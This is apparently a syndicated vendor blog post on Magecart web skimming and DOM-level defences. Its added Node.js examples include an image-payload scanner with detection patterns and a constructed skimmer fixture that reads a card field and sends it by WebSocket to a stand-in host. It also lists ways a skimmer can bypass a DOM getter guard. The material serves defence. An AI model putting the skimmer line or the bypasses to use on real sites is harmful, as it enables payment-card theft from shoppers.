Stopping data loss is getting harder as Magecart attackers employ new techniques

Web skimming attacks, such as those carried out by Magecart, made headlines in 2019 as major online businesses publicly disclosed attacks. While web skimming attacks aim to steal all types of sensitive personal data, such as social security numbers, email addresses, and passwords, Magecart attackers almost exclusively target websites with the aim of stealing credit card numbers. 

New year, new attack techniques

Like any capable cybercriminals, Magecart groups keep evolving their web skimmers to evade security tooling. A recent article highlighted two techniques disclosed by @affablekraut that are now being used in web skimming attacks:

  • Steganography – Attackers hide malicious JavaScript inside another file type, typically an image. Most crawlers and scanners concentrate on HTML and JavaScript files and skip media files for speed, so the payload goes unnoticed; a small loader on the page still has to extract and execute it.
  • WebSockets – Attackers open a WebSocket to a server they control and use it both to deliver the skimming code and to exfiltrate the harvested data. WebSockets offer real-time transfer, but the real advantage to attackers is covertness: the connection is a single long-lived channel rather than a series of HTTP requests, which are what most exfiltration monitoring watches.
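As an added example (not code from the original post or from Instart), a Node.js check for the simplest form of image-hosted payload: a script appended after the image's end-of-image marker. PNG ends with the IEND chunk and JPEG with the FFD9 marker, so any bytes after that point do not belong to the image. The post only says the script is concealed in an image; that it is appended after the end marker is an assumption here. The sample files, the skimmer snippet and the host example.invalid are constructed for the demonstration.

```javascript
// Added example, not code from the original post. Flags image files that
// carry bytes after the format's end-of-image marker, one known place to
// hide a script payload (an assumption about the technique; the post only
// says the script is concealed in an image). Sample bytes are constructed.

const PNG_MAGIC = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);
const JPEG_EOI = Buffer.from([0xff, 0xd9]);

// Strings a skimmer body tends to contain; tune for your own environment.
const SCRIPT_HINTS = [
  /function\s*\(/, /document\./, /new\s+WebSocket\s*\(/, /\.value\b/, /eval\s*\(/,
];

// Walk PNG chunks (4-byte length, 4-byte type, data, 4-byte CRC) and return
// the offset just past the IEND chunk, or -1 if there is none.
function pngEnd(buf) {
  let off = PNG_MAGIC.length;
  while (off + 8 <= buf.length) {
    const len = buf.readUInt32BE(off);
    const type = buf.toString('ascii', off + 4, off + 8);
    const next = off + 8 + len + 4;
    if (type === 'IEND') return next;
    off = next;
  }
  return -1;
}

// Offset where the image legitimately ends, or -1 for an unknown format.
// For JPEG we take the last FFD9; an appended text payload cannot contain
// that byte pair, so it cannot push the marker forward.
function imageEnd(buf) {
  if (buf.length >= 8 && buf.subarray(0, 8).equals(PNG_MAGIC)) return pngEnd(buf);
  if (buf.length >= 2 && buf[0] === 0xff && buf[1] === 0xd8) {
    const i = buf.lastIndexOf(JPEG_EOI);
    return i === -1 ? -1 : i + 2;
  }
  return -1;
}

// Classify a file: clean, trailing-data (extra bytes, no script markers),
// suspicious (extra bytes that look like JavaScript), or not parseable.
function scanImage(buf) {
  const end = imageEnd(buf);
  if (end === -1) return { status: 'unknown-format', trailerBytes: 0, hints: [] };
  if (end > buf.length) return { status: 'truncated', trailerBytes: 0, hints: [] };
  const trailer = buf.subarray(end);
  const text = trailer.toString('latin1');
  const hints = SCRIPT_HINTS.filter((re) => re.test(text)).map(String);
  let status = 'clean';
  if (trailer.length > 0) status = hints.length ? 'suspicious' : 'trailing-data';
  return { status, trailerBytes: trailer.length, hints };
}

// Constructed samples. CRCs are zero, which a strict decoder would reject,
// but the end-of-image check does not depend on them.
function pngChunk(type, data) {
  const len = Buffer.alloc(4);
  len.writeUInt32BE(data.length);
  return Buffer.concat([len, Buffer.from(type, 'ascii'), data, Buffer.alloc(4)]);
}
const CLEAN_PNG = Buffer.concat([
  PNG_MAGIC, pngChunk('IHDR', Buffer.alloc(13)), pngChunk('IEND', Buffer.alloc(0)),
]);
const SKIMMER_JS = Buffer.from(
  '(function(){var cc=document.querySelector("#card").value;' +
  'new WebSocket("wss://example.invalid/ws").send(cc)})()', 'latin1');
const TAINTED_PNG = Buffer.concat([CLEAN_PNG, SKIMMER_JS]);
// Minimal constructed JPEG: SOI, an empty APP0 segment, EOI.
const CLEAN_JPEG = Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x02, 0xff, 0xd9]);

for (const [name, buf] of [['clean.png', CLEAN_PNG], ['tainted.png', TAINTED_PNG], ['clean.jpg', CLEAN_JPEG]]) {
  console.log(name, scanImage(buf));
}
```

The check is only as good as its notion of where the image ends: a payload stored inside a metadata chunk (an EXIF or text field, for instance) rather than appended would pass it, so a production scanner also has to parse those chunks. Treat a hit as a signal to inspect which script on the page fetched the image, since that loader is the part that actually runs.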

These creative techniques underline that attackers understand how most web security solutions identify online skimming. In most cases, web skimming protection monitors for specific attack markers, including:

  • Malicious JavaScript in the Document Object Model (DOM) 
  • Skimming code from third-party resources
  • Unauthorized exfiltration of data using HTTP GET or HTTP POST requests


Network control will not always prevent new types of web skimming

One of the most common forms of protection against web skimming is network control. Such solutions monitor and control network traffic from the web application to any third-party location, such as a malicious host's server, typically through a gateway configured with whitelisted and blacklisted network destinations.

This type of protection is effective at stopping a web skimmer in a Magecart attack from sending a credit card number to a remote server. There is a caveat, however: the approach assumes the attacker exfiltrates the stolen data through a method that the web security solution in use actually blocks.

For example, if a web skimming protection solution automatically blocks XMLHttpRequest (the most common way JavaScript requests or sends data), it would stop some of the best-known skimming attacks, such as those that hit Macy's and British Airways. However, as the techniques above illustrate, web skimming attackers are finding ways around this kind of protection by manipulating the DOM to use image loads, iframe URLs, or WebSockets both to deliver the skimmer and to exfiltrate customer data.

DOM control is the best way to prevent data exfiltration

The reality is that JavaScript was never designed for the way it is used today, and while the language has evolved dramatically, strict, overarching security layers cannot be imposed without breaking millions of websites. All web skimming protection technologies bring some form of security to the browser, but the further a layer sits from the root document (the web page itself), the easier it is for attackers to get around it.

Instart Web Skimming Protection differs from network-level protection, such as the solutions offered by Ensighten and Tala Security, by preventing access to the sensitive data itself, at the DOM. For example, if a malicious script attempts to read the field where a credit card number is entered, the read is blocked regardless of the network method the script would later use. The script cannot read the field, so there is no data to send back to the attackers. By controlling access at the document level, directly in the browser, it does not matter how attackers adapt their malware to transmit stolen data: the script never obtains the data in the first place.
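To make the data-level idea concrete, here is an added example (not Instart's code, and not a description of how their product is built) of the capture-and-shadow pattern behind DOM read control, simulated in Node.js. `StubInput` is a stand-in for `HTMLInputElement`, `installDomGuard`, `skimmerCollect` and `demo` are hypothetical names, and the card number and e-mail address are constructed test data. In a browser the same steps would target `HTMLInputElement.prototype` and would have to run before any third-party script.

```javascript
// Added example, not Instart's code. Shows the capture-and-shadow idea behind
// DOM-level read control, simulated in Node with a stub element standing in
// for HTMLInputElement. In a browser the same steps target
// HTMLInputElement.prototype and must run before any third-party script.

// Factory so each demo run gets a fresh prototype to guard. The backing field
// is reachable on this stub; a real input element's value lives in native
// state that only the accessor can reach.
function makeStubInput() {
  return class StubInput {
    constructor(name, sensitive) {
      this.name = name;
      this.dataset = { sensitive: String(sensitive) };  // like data-sensitive="true"
      this.internalValue = '';
    }
    get value() { return this.internalValue; }
    set value(v) { this.internalValue = String(v); }
  };
}

// Replace the prototype's 'value' getter. The original getter survives only
// inside this closure, handed back as a trusted reader for first-party code.
// Any other read of a sensitive field gets '' and is logged.
function installDomGuard(proto) {
  const desc = Object.getOwnPropertyDescriptor(proto, 'value');
  const nativeGet = desc.get;
  const blocked = [];
  Object.defineProperty(proto, 'value', {
    configurable: false,   // a later script cannot redefine it back
    enumerable: desc.enumerable,
    get() {
      if (this.dataset && this.dataset.sensitive === 'true') {
        blocked.push(this.name);
        return '';
      }
      return nativeGet.call(this);
    },
    set: desc.set,         // typing into the field still works
  });
  return { read: (el) => nativeGet.call(el), blocked };
}

// What a skimmer does before choosing an exfil channel (XHR, image beacon,
// WebSocket): collect field values. With the guard in place this step is
// where it already fails, whatever channel follows.
function skimmerCollect(fields) {
  return fields.map((f) => `${f.name}=${f.value}`).join('&');
}

function demo() {
  const StubInput = makeStubInput();
  const guard = installDomGuard(StubInput.prototype);   // first-party, runs first
  const card = new StubInput('cardnumber', true);
  const email = new StubInput('email', false);
  card.value = '4111111111111111';   // constructed test card number
  email.value = 'alice@example.com'; // constructed
  return {
    stolen: skimmerCollect([card, email]),
    legit: guard.read(card),
    blocked: guard.blocked.slice(),
  };
}

console.log(demo());
```

The simplified shadowing above has known gaps that a production control has to close: a skimmer that loads before the guard keeps the original getter, a skimmer can fetch a pristine prototype from a freshly created same-origin iframe's `contentWindow`, and a skimmer that records keystrokes through event listeners never reads the field at all. The point the example does show is the one the paragraph makes: once the read fails, the choice of exfiltration channel is irrelevant.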



*** This is a Security Bloggers Network syndicated blog from Instart blog RSS authored by Jon Wallace. Read the original post at: https://www.instart.com/blog/stopping-data-loss-magecart-new-techniques